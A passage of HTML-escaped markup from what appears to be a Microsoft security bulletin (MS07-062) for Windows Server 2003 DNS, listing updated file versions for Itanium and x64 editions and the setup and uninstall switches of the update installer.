/&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;X64&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP2QFE&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;ww03a2409.dll&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.4106&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:02&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;453,632&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;X86&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP2QFE\wow&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;For all supported Itanium-based editions of Windows Server 2003:&lt;/p&gt;&lt;table class="dataTable" id="EDWAE" cellpadding="0" cellspacing="0" width="87%"&gt;&lt;thead&gt;&lt;tr class="stdHeader" valign="top"&gt;&lt;td id="colEGWAE" width="18%"&gt;File Name&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colEKWAE" width="13%"&gt;Version&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colEOWAE" width="16%"&gt;Date&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colESWAE" width="9%"&gt;Time&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colEWWAE" width="13%"&gt;Size&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colE1WAE" width="9%"&gt;CPU&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colE5WAE" style="border-right: 1px solid rgb(204, 204, 204);" width="18%"&gt;Folder&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;dns.exe&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.3027&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:04&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;1,129,472&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;IA-64&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP1GDR&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;wdns.exe&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.3027&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:04&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;444,928&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;X86&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP1GDR\wow&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;dns.exe&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.3027&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:04&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;1,132,544&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;IA-64&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP1QFE&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;w03a2409.dll&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.2957&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:04&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;27,648&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;IA-64&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP1QFE&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;wdns.exe&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.3027&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:04&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;445,440&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;X86&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP1QFE\wow&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;ww03a2409.dll&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.2957&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:04&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;28,672&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;X86&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP1QFE\wow&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;dns.exe&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.4171&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:10&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;1,131,520&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;IA-64&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP2GDR&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;dns.exe&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.4171&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:04&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;1,132,544&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;IA-64&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP2QFE&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;w03a2409.dll&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.4082&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:04&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;452,608&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;IA-64&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP2QFE&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;ww03a2409.dll&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;5.2.3790.4106&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;17-Oct-2007&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;18:04&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;453,632&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;X86&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;SP2QFE\wow&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;&lt;b&gt;Note&lt;/b&gt; For a complete list of supported versions, see the Support Lifecycle Index. For a complete list of service packs, see &lt;a href="http://support.microsoft.com/gp/LifeSupSps"&gt;Lifecycle Supported Service Packs&lt;/a&gt;. For more information on the support lifecycle policy, see &lt;a href="http://support.microsoft.com/lifecycle/"&gt;Microsoft Support Lifecycle&lt;/a&gt;.&lt;/p&gt;&lt;/div&gt;&lt;div class="secTop"&gt;&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EYMAE"&gt;&lt;img src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/arrow_px_up.gif" alt="Top of section" border="0" height="9" width="7" /&gt;&lt;/a&gt;&lt;a class="topOfPage" href="http://www.microsoft.com/technet/security/bulletin/ms07-062.mspx#EYMAE"&gt;Top of section&lt;/a&gt;&lt;/div&gt;&lt;/div&gt;&lt;a name="EF3AE"&gt;&lt;/a&gt;&lt;table border="0" cellpadding="0" cellspacing="0"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="padding: 2px 6px 0px 0px;"&gt;&lt;script language="javascript"&gt;sID='4l3-EF3AE';writePM(sID)&lt;/script&gt;&lt;a href="javascript:Toggle('s4l3-EF3AE')"&gt;&lt;img id="is4l3-EF3AE" src="http://www.microsoft.com/library/gallery/templates/MNP2.Common/images/plus.gif" border="0" height="9" width="9" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td class="secLabel"&gt;&lt;script language="javascript"&gt;startA('s'+sID)&lt;/script&gt;&lt;h5&gt;&lt;a href="javascript:Toggle('s4l3-EF3AE')" style="text-decoration: none;"&gt;Deployment Information&lt;/a&gt;&lt;/h5&gt;&lt;a href="javascript:Toggle('s4l3-EF3AE')" style="text-decoration: none;"&gt;&lt;script language="javascript"&gt;endA()&lt;/script&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;div style="display: none;" id="s4l3-EF3AE"&gt;&lt;script language="javascript"&gt;chkHide('s'+sID);&lt;/script&gt;&lt;div class="expandoIndent"&gt;&lt;p&gt;&lt;b&gt;Installing the Update&lt;/b&gt;&lt;/p&gt;&lt;p&gt;When you install this security update, the installer checks to see if one or more of the files that are being updated on your system have previously been updated by a Microsoft hotfix.&lt;/p&gt;&lt;p&gt;For more information about the terminology that appears in this bulletin, such as &lt;i&gt;hotfix&lt;/i&gt;, see &lt;a href="http://support.microsoft.com/kb/824684"&gt;Microsoft Knowledge Base Article 824684&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;This security update supports the following setup switches.&lt;/p&gt;&lt;table class="dataTable" id="EW3AE" cellpadding="0" cellspacing="0" width="69%"&gt;&lt;thead&gt;&lt;tr&gt;&lt;td class="tableHeader" colspan="2"&gt;Supported Security Update Installation Switches&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="stdHeader" valign="top"&gt;&lt;td id="colE13AE" width="37%"&gt;Switch&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colE53AE" style="border-right: 1px solid rgb(204, 204, 204);" width="62%"&gt;Description&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/help&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Displays the command-line options&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="subHeader"&gt;&lt;td&gt;Setup Modes&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/passive&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Unattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/quiet&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="subHeader"&gt;&lt;td&gt;Restart Options&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/norestart&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Does not restart when installation has completed&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/forcerestart&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Restarts the computer after installation and force other applications to close at shutdown without saving open files first.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/warnrestart[:x]&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Presents a dialog box with a timer warning the user that the computer will restart in &lt;i&gt;x&lt;/i&gt; seconds. (The default setting is 30 seconds.) Intended for use with the &lt;b&gt;/quiet&lt;/b&gt; switch or the &lt;b&gt;/passive&lt;/b&gt; switch.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/promptrestart&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Display a dialog box prompting the local user to allow a restart&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="subHeader"&gt;&lt;td&gt;Special Options&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/overwriteoem&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Overwrites OEM files without prompting&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/nobackup&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Does not back up files needed for uninstall&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/forceappsclose&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Forces other programs to close when the computer shuts down&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/log:path&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Allows the redirection of installation log files&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/integrate:path&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Integrates the update into the Windows source files. These files are located at the path that is specified in the switch.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/extract[:path]&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Extracts files without starting the Setup program&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/ER&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Enables extended error reporting&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/verbose&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Enables verbose logging. During installation, creates %Windir%\CabBuild.log. This log details the files that are copied. Using this switch may cause the installation to proceed more slowly.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;p&gt;&lt;b&gt;Note &lt;/b&gt;You can combine these switches into one command. For backward compatibility, the security update also supports many of the setup switches that the earlier version of the Setup program uses. For more information about the supported installation switches, see &lt;a href="http://support.microsoft.com/kb/262841"&gt;Microsoft Knowledge Base Article 262841&lt;/a&gt;. For more information about the Update.exe installer, visit the &lt;a href="http://go.microsoft.com/fwlink/?LinkId=38951"&gt;Microsoft TechNet Web site&lt;/a&gt;.&lt;/p&gt;&lt;p&gt;&lt;b&gt;Removing the Update&lt;/b&gt;&lt;/p&gt;&lt;p&gt;This security update supports the following setup switches.&lt;/p&gt;&lt;table class="dataTable" id="ENBAG" cellpadding="0" cellspacing="0" width="69%"&gt;&lt;thead&gt;&lt;tr&gt;&lt;td class="tableHeader" colspan="2"&gt;Supported Spuninst.exe Switches&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="stdHeader" valign="top"&gt;&lt;td id="colERBAG" width="37%"&gt;Switch&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td id="colEVBAG" style="border-right: 1px solid rgb(204, 204, 204);" width="62%"&gt;Description&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/help&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Displays the command-line options&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="subHeader"&gt;&lt;td&gt;Setup Modes&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/passive&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Unattended Setup mode. No user interaction is required, but installation status is displayed. If a restart is required at the end of Setup, a dialog box will be presented to the user with a timer warning that the computer will restart in 30 seconds.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/quiet&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Quiet mode. This is the same as unattended mode, but no status or error messages are displayed.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="subHeader"&gt;&lt;td&gt;Restart Options&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/norestart&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Does not restart when installation has completed&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="evenRecord" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/forcerestart&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Restarts the computer after installation and force other applications to close at shutdown without saving open files first.&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr class="record" valign="top"&gt;&lt;td&gt;&lt;p class="lastInCell"&gt;&lt;b&gt;/warnrestart[:x]&lt;/b&gt;&lt;/p&gt;&lt;br /&gt;&lt;br /&gt;&lt;/td&gt;&lt;td style="border-right: 1px solid rgb(204, 204, 204);"&gt;&lt;p class="lastInCell"&gt;Presents a dialog box with a timer warning the user that the computer will restart in &lt;i&gt;x&lt;/i&gt; seconds. (The default setting is 30 seconds.) Intended for use with the &lt;b&gt;/quiet&lt;/b&gt; switch or the &lt;b&gt;/passive&lt;/b&gt; 